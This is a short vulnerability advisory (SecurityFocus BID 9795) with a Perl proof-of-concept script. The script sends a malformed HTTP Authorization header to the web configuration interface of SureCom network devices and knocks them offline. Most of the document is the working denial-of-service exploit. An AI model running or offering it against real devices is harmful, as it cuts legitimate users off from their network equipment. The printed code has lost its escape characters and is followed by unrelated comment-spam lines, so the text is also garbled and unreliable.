source: http://www.securityfocus.com/bid/9795/info
An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device.
#!/usr/bin/perl
use IO::Socket;
# default settings
$server = "192.168.0.1";
$port = "80";
$http_request = "GET / HTTP/1.1rnAuthorization: B 00000000rnrn";
if(@ARGV == 2) {
$server = $ARGV[0];
$port = $ARGV[1];
}
else {
print "Usage: ./surecom_tester [address] [port]nn";
print "Using default settings...nn";
}
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server,
PeerPort=>$port)
or die "ERROR: can't connect to $server on port $portnn";
print $socket $http_request;
$http_response = <$socket>;
print "The server's not vulnerable and replied with " . $http_response .
"n";
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666